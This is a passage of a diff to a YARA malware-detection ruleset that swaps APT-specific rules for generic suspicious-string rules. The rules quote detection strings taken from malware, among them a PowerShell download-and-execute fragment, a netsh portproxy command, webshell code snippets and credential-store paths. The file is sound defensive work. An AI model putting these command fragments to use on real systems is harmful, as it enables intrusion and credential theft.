+		$s1 = "Microsoft(C) Windows(C) Operating System" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Remoteexec_Tool : FILE
+rule SIGNATURE_BASE_SUSP_LNK_File_Appdata_Roaming : FILE
 {
 	meta:
-		description = "Remote Access Tool used in APT Terracotta"
+		description = "Detects a suspicious link file that references to AppData Roaming"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3262147-3455-554c-88fc-b523352efe7f"
-		date = "2015-08-04"
-		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L47-L65"
+		id = "d905e58f-ae2e-5dc2-b206-d0435b023df0"
+		date = "2018-05-16"
+		modified = "2025-03-21"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L148-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78"
-		logic_hash = "951cc65e14c2ff035ccc06d080730b1c25208caa1d30129074a6150557a5cebe"
-		score = 75
+		logic_hash = "5e5c78d3fe3fcdbfb097f833fbb1e15ad1f79e63b330eaba754d8b5296b5165a"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cmd.exe /q /c \"%s\"" fullword ascii
-		$s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii
-		$s2 = "This is a service executable! Couldn't start directly." fullword ascii
-		$s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii
-		$s4 = "TermHlp_stdout" fullword ascii
-		$s5 = "TermHlp_stdin" fullword ascii
+		$s2 = "AppData" fullword wide
+		$s3 = "Roaming" fullword wide
+		$s4 = { 00 2E 00 65 00 78 00 65 00 2E 00 43 00 3A 00 5C
+              00 55 00 73 00 65 00 72 00 73 00 5C }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 75KB and 4 of ( $s* )
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Liudoor_Malware_1 : FILE
+rule SIGNATURE_BASE_SUSP_LNK_File_Pathtraversal : FILE
 {
 	meta:
-		description = "Liudoor Trojan used in Terracotta APT"
+		description = "Detects a suspicious link file that references a file multiple folders lower than the link itself"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebd5833e-1f5c-5166-aaba-d0be64829e6c"
-		date = "2015-08-04"
-		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L69-L89"
+		id = "f4f6709f-9c4d-5f0c-9826-97444d282adc"
+		date = "2018-05-16"
+		modified = "2025-03-21"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L170-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ef9fcc5df910e796d8b015396cf37614982ebbf9be6f6a4a8d271d4263a36a9"
-		score = 70
+		logic_hash = "9935c454518abe7fd4ec4f09e36e4200ec7c9f3b3ad004e9b49d60c08f508236"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc"
-		hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5"
-		hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb"
 
 	strings:
-		$s1 = "svchostdllserver.dll" fullword ascii
-		$s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii
-		$s3 = "\\nbtstat.exe" ascii
-		$s4 = "DataVersionEx" fullword ascii
+		$s1 = "..\\..\\..\\..\\..\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Liudoor_Malware_2 : FILE
+rule SIGNATURE_BASE_SUSP_Script_Obfuscation_Char_Concat
 {
 	meta:
-		description = "Liudoor Trojan used in Terracotta APT"
+		description = "Detects strings found in sample from CN group repo leak in October 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "30b9d727-ec77-5ead-80dd-6d442478e78b"
-		date = "2015-08-04"
-		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L91-L108"
+		id = "6d3bfdfd-ef8f-5740-ac1f-5835c7ce0f43"
+		date = "2018-10-04"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L188-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12cc72fb147f2d580f9f9e2a9bdfbec3f7b0e977871a27ccc941cd0b1aaa634c"
-		score = 70
+		logic_hash = "28b648e0e1c22fefa49a937f40bd4ed09c5d3894ff059979bad69e8bc98fcac2"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
-		hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
+		tags = ""
+		hash1 = "b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b"
 
 	strings:
-		$s0 = "svchostdllserver.dll" fullword ascii
-		$s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii
+		$s1 = "\"c\" & \"r\" & \"i\" & \"p\" & \"t\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Explosive_EXE : APT FILE
+rule SIGNATURE_BASE_SUSP_Powershell_IEX_Download_Combo
 {
 	meta:
-		description = "Explosion/Explosive Malware - Volatile Cedar APT"
-		author = "Check Point Software Technologies Inc."
-		id = "3a9fb6b2-2f19-5d70-81ed-a08c3b8b2d80"
-		date = "2016-02-15"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L1-L12"
+		description = "Detects strings found in sample from CN group repo leak in October 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1dfedcb0-345c-548c-85ac-3c1e78bfd9e2"
+		date = "2018-10-04"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L202-L218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77eb74586f5ef2878c0d283b925e6e066f704d00525303990cf5ea7988a6637d"
-		score = 75
+		logic_hash = "0a1507859354e0e0d9284befcf777c4d3883496eb96524a246a1df4f3a247aa9"
+		score = 65
 		quality = 85
-		tags = "APT, FILE"
+		tags = ""
+		hash1 = "13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5"
 
 	strings:
-		$DLD_S = "DLD-S:"
-		$DLD_E = "DLD-E:"
+		$x1 = "IEX ((new-object net.webclient).download" ascii nocase
+		$fp1 = "chocolatey.org"
+		$fp2 = "Remote Desktop in the Appveyor"
+		$fp3 = "/appveyor/" ascii
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D
+		$x1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Explosion_Sample_1 : FILE
+rule SIGNATURE_BASE_SUSP_Win32Dll_String : FILE
 {
 	meta:
-		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		description = "Detects suspicious string in executables"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcf28185-75a8-5c9f-9f60-edb8dc187e16"
-		date = "2015-04-03"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/5vYaNb"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L14-L38"
+		id = "b1c78386-c23d-5138-942a-3da90e5802cc"
+		date = "2018-10-24"
+		modified = "2025-03-21"
+		reference = "https://medium.com/@Sebdraven/apt-sidewinder-changes-theirs-ttps-to-install-their-backdoor-f92604a2739"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L220-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c97693ecb36247bdb44ab3f12dfeae8be4d299bb"
-		logic_hash = "f559880c182cf8061d640f60f18fe607d88a1f22216d93ff1d0ece720bcc94a7"
-		score = 70
+		logic_hash = "514596e078483920cedf0091cd769d8462acfd39956c3ed3e12d630b02ebb7cc"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7bd7cec82ee98feed5872325c2f8fd9f0ea3a2f6cd0cd32bcbe27dbbfd0d7da1"
 
 	strings:
-		$s5 = "REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$s9 = "WinAutologon From Winlogon Reg" fullword ascii
-		$s10 = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0" fullword ascii
-		$s11 = "IE:Password-Protected sites" fullword ascii
-		$s12 = "\\his.sys" ascii
-		$s13 = "HTTP Password" fullword ascii
-		$s14 = "\\data.sys" ascii
-		$s15 = "EL$_RasDefaultCredentials#0" fullword wide
-		$s17 = "Office Outlook HTTP" fullword ascii
-		$s20 = "Hist :<b> %ws</b>  :%s </br></br>" fullword ascii
+		$s1 = "win32dll.dll" fullword ascii
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D
+		filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Explosion_Sample_2 : FILE
+rule SIGNATURE_BASE_SUSP_Modified_Systemexefilename_In_File : FILE
 {
 	meta:
-		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		description = "Detecst a variant of a system file name often used by attackers to cloak their activity"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8be7ed50-0bfc-5302-b4fa-8817bf1750d7"
-		date = "2015-04-03"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/5vYaNb"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L40-L57"
+		id = "97d91e1b-49b8-504e-9e9c-6cfb7c2afe41"
+		date = "2018-12-11"
+		modified = "2025-03-21"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L234-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62fe6e9e395f70dd632c70d5d154a16ff38dcd29"
-		logic_hash = "db7ead96e0a9b4cf5c5cc885eac421cc11988f60d03f94de5fe828899d115bf0"
-		score = 70
+		logic_hash = "45c01024c4e6a3563cd27d8a78e2236d49aa795d24f322774a14b4c7289830c4"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a"
+		hash2 = "f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e"
 
 	strings:
-		$s0 = "serverhelp.dll" fullword wide
-		$s1 = "Windows Help DLL" fullword wide
-		$s5 = "SetWinHoK" fullword ascii
+		$s1 = "svchosts.exe" fullword wide
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Explosion_Generic_1 : FILE
+rule SIGNATURE_BASE_SUSP_JAVA_Class_With_VBS_Content : FILE
 {
 	meta:
-		description = "Generic Rule for Explosion/Explosive Malware - Volatile Cedar APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dc3721b6-c19e-5449-9962-2a6f844e49b4"
-		date = "2015-04-03"
-		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L59-L88"
+		description = "Detects a JAVA class file with strings known from VBS files"
+		author = "Florian Roth"
+		id = "472cbeaf-28e7-51a2-b2e6-96c1d9d05b26"
+		date = "2019-01-03"
+		modified = "2025-03-20"
+		reference = "https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L250-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8b6e1e6aa838036989040dfbf4f6f3e347a717967deef740b35d1752b5c91da5"
+		logic_hash = "bf325bbb6a448f977e4e661e4296c4145de9a809c79cee8538d660ecaff76e94"
 		score = 70
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d0f059ba21f06021579835a55220d1e822d1233f95879ea6f7cb9d301408c821"
-		hash1 = "1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908"
-		hash2 = "d8fdcdaad652c19f4f4676cd2f89ae834dbc19e2759a206044b18601875f2726"
-		hash3 = "e2e6ed82703de21eb4c5885730ba3db42f3ddda8b94beb2ee0c3af61bc435747"
-		hash4 = "03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0"
+		hash1 = "e0112efb63f2b2ac3706109a233963c19750b4df0058cc5b9d3fa1f1280071eb"
 
 	strings:
-		$s0 = "autorun.exe" fullword
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CL"
-		$s2 = "%drp.exe" fullword
-		$s3 = "%s_%s%d.exe" fullword
-		$s4 = "open=autorun.exe" fullword
-		$s5 = "http://www.microsoft.com/en-us/default.aspx" fullword
-		$s10 = "error.renamefile" fullword
-		$s12 = "insufficient lookahead" fullword
-		$s13 = "%s %s|" fullword
-		$s16 = ":\\autorun.exe" fullword
+		$a1 = "java/lang/String" ascii
+		$s1 = ".vbs" ascii
+		$s2 = "createNewFile" fullword ascii
+		$s3 = "wscript" fullword ascii nocase
+		$fp1 = "com/smm/"
+		$fp2 = "install"
 
 	condition:
-		7 of them and uint16( 0 ) == 0x5A4D
+		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 100KB and $a1 and all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Explosive_UA : FILE
+rule SIGNATURE_BASE_SUSP_RAR_With_PDF_Script_Obfuscation : FILE
 {
 	meta:
-		description = "Explosive Malware Embedded User Agent - Volatile Cedar APT http://goo.gl/HQRCdw"
+		description = "Detects RAR file with suspicious .pdf extension prefix to trick users"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d88d5fd6-adf9-5ced-8b79-e47e3ffbde50"
-		date = "2015-04-03"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/HQRCdw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L90-L104"
+		id = "a3d2f5e9-3052-551b-8b2c-abcdd1ac2e48"
+		date = "2019-04-06"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L277-L293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ed7fedcf9cda868803c8ace393e08709a747b909178e19cdbb1b116edbb82f9"
-		score = 60
+		logic_hash = "05e9fd7620a70a490548d4562c80497bcf888e493b8e1188e0a0e0c274e2a7e5"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b629b46b009a1c2306178e289ad0a3d9689d4b45c3d16804599f23c90c6bca5b"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" fullword
+		$s1 = ".pdf.vbe" ascii
+		$s2 = ".pdf.vbs" ascii
+		$s3 = ".pdf.ps1" ascii
+		$s4 = ".pdf.bat" ascii
+		$s5 = ".pdf.exe" ascii
 
 	condition:
-		$x1 and uint16( 0 ) == 0x5A4D
+		uint32( 0 ) == 0x21726152 and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_Caterpillar_ASPX
+rule SIGNATURE_BASE_SUSP_Netsh_Portproxy_Command
 {
 	meta:
-		description = "Volatile Cedar Webshell - from file caterpillar.aspx"
+		description = "Detects a suspicious command line with netsh and the portproxy command"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9af48c64-3768-5765-8245-38df000598a7"
-		date = "2015-04-03"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/emons5"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volatile_cedar.yar#L106-L126"
+		id = "cbbd2042-572c-5283-bd45-e745b36733ad"
+		date = "2019-04-20"
+		modified = "2025-03-21"
+		reference = "https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L295-L308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9df2e4a25052136d6e622273f917bd15df410869a8cf3075c773a14ea62a2a55"
-		score = 75
+		logic_hash = "dbf82a908e77886af1c31c51f5f6684015cbcb22bf28876c2e1b0dd1ea5bd2b4"
+		score = 65
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "af4c99208fb92dc42bc98c4f96c3536ec8f3fe56"
+		hash1 = "9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09"
 
 	strings:
-		$s0 = "Dim objNewRequest As WebRequest = HttpWebRequest.Create(sURL)" fullword
-		$s1 = "command = \"ipconfig /all\"" fullword
-		$s3 = "For Each xfile In mydir.GetFiles()" fullword
-		$s6 = "Dim oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
-		$s10 = "recResult = adoConn.Execute(strQuery)" fullword
-		$s12 = "b = Request.QueryString(\"src\")" fullword
-		$s13 = "rw(\"<a href='\" + link + \"' target='\" + target + \"'>\" + title + \"</a>\")" fullword
+		$x1 = "netsh interface portproxy add v4tov4 listenport=" ascii
 
 	condition:
-		all of them
+		1 of them
 }
-
-rule SIGNATURE_BASE_Reaver3_Malware_Nov17_1 : FILE
+rule SIGNATURE_BASE_SUSP_Dropperbackdoor_Keywords : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		description = "Detects suspicious keywords that indicate a backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95419d6f-b657-53c4-840d-9a9e9b00787e"
-		date = "2017-11-11"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L14-L27"
+		id = "2942ba6d-a533-5954-bfcf-417262e2fac2"
+		date = "2019-04-24"
+		modified = "2025-03-21"
+		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L310-L322"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa141a1d3868bd4a004794bf51dc20086eb2e1446e1fa374834a6f2d84940c0d"
-		score = 75
+		logic_hash = "e83fa95bb2b9ac821d0a00af23834495066ad2cad38ef4f4dcc81aee75415d74"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1813f10bcf74beb582c824c64fff63cb150d178bef93af81d875ca84214307a1"
+		hash1 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
 
 	strings:
-		$s1 = "CPL.dll" fullword ascii
+		$x4 = "DropperBackdoor" fullword wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "e722dd50a0e2bc0cab8ca35fc4bf6d99" and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_Reaver3_Malware_Nov17_2 : FILE
+rule SIGNATURE_BASE_SUSP_SFX_Cmd : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		description = "Detects suspicious SFX as used by Gamaredon group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "423ae050-5087-528e-be0a-c612024dc70a"
-		date = "2017-11-11"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L29-L53"
+		id = "87e75fe6-c2d7-5cb4-9432-7c37dbfe94b8"
+		date = "2018-09-27"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L324-L336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f987876dae35d17fb3ac0d4d3cfe1e00f8977aa696194cc48e53ac1db9d55fca"
-		score = 75
-		quality = 85
+		logic_hash = "592de6a2165396c4ae8f494e26e56d0a759903b51167b1531b791897dce66868"
+		score = 65
+		quality = 60
 		tags = "FILE"
-		hash1 = "9213f70bce491991c4cbbbd7dc3e67d3a3d535b965d7064973b35c50f265e59b"
-		hash2 = "98eb5465c6330b9b49df2e7c9ad0b1164aa5b35423d9e80495a178eb510cdc1c"
+		hash1 = "965129e5d0c439df97624347534bc24168935e7a71b9ff950c86faae3baec403"
 
 	strings:
-		$x1 = "WindowsUpdateReaver" fullword wide
-		$s1 = "\\WUpdate.~tmp" ascii
-		$s2 = "\\~WUpdate.lnk" ascii
-		$s3 = "\\services\\" ascii
-		$s4 = "moomjufps" fullword ascii
-		$s5 = "gekmomkege" fullword ascii
+		$s1 = /RunProgram=\"hidcon:[a-zA-Z0-9]{1,16}.cmd/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "837cc5062a0758335b257ea3b27972b2" or 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_Reaver3_Malware_Nov17_3 : FILE
+rule SIGNATURE_BASE_SUSP_XMRIG_Reference : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		description = "Detects an executable with a suspicious XMRIG crypto miner reference"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc2511a9-8938-5f4d-9802-f73e44609bf9"
-		date = "2017-11-11"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L55-L80"
+		id = "0a7324ce-90dc-5e6a-b22a-c29eccf324e9"
+		date = "2019-06-20"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/itaitevet/status/1141677424045953024"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L338-L350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32654255102aee872402b0910422701f3cd4d0b2b8fc6e83440f325923ab9e2f"
-		score = 75
+		logic_hash = "c1e6f5fc390a8ada0688885bba7ed90372915deba5a5e7e5b0cd17ec450ce240"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "18ac3b14300ecfeed4b64a844c16dccb06b0e3513d0954d6c6182f2ea14e4c92"
-		hash2 = "c0f8bb77284b96e07cab1c3fab8800b1bbd030720c74628c4ee5666694ef903d"
-		hash3 = "c906250e0a4c457663e37119ebe1efa1e4b97eef1d975f383ac3243f9f09908c"
-		hash4 = "1fcda755e8fa23d27329e4bc0443a82e1c1e9a6c1691639db256a187365e4db1"
-		hash5 = "d560f44188fb56d3abb11d9508e1167329470de19b811163eb1167534722e666"
 
 	strings:
-		$s1 = "winhelp.dat" fullword ascii
-		$s2 = "\\microsoft\\Credentials\\" ascii
-		$s3 = "~Update.lnk" fullword ascii
-		$s4 = "winhelp.cpl" fullword ascii
-		$s5 = "\\services\\" ascii
+		$x1 = "\\xmrig\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8ee521b2316ddd6af1679eac9f5ed77b" or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Sunorcal_Malware_Nov17_1 : FILE
+rule SIGNATURE_BASE_SUSP_Just_EICAR : FILE
 {
 	meta:
-		description = "Detects Reaver malware mentioned in PaloAltoNetworks report"
+		description = "Just an EICAR test file - this is boring but users asked for it"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8a21570-d1d6-52c3-abb2-ecaa86eb7ff0"
-		date = "2017-11-11"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_reaver_sunorcal.yar#L82-L104"
+		id = "e5eedd77-36e2-56a0-be0c-2553043c225a"
+		date = "2019-03-24"
+		modified = "2025-03-21"
+		reference = "http://2016.eicar.org/85-0-Download.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L352-L365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "88e6280c04b12b1d8530bafb44afc180685550f1f6bcefb731b3247f6a9529a2"
-		score = 75
+		logic_hash = "a48fc3542fb07131fe0a2e25277009d21b9ca7c9e112873249e5b9c31511af79"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
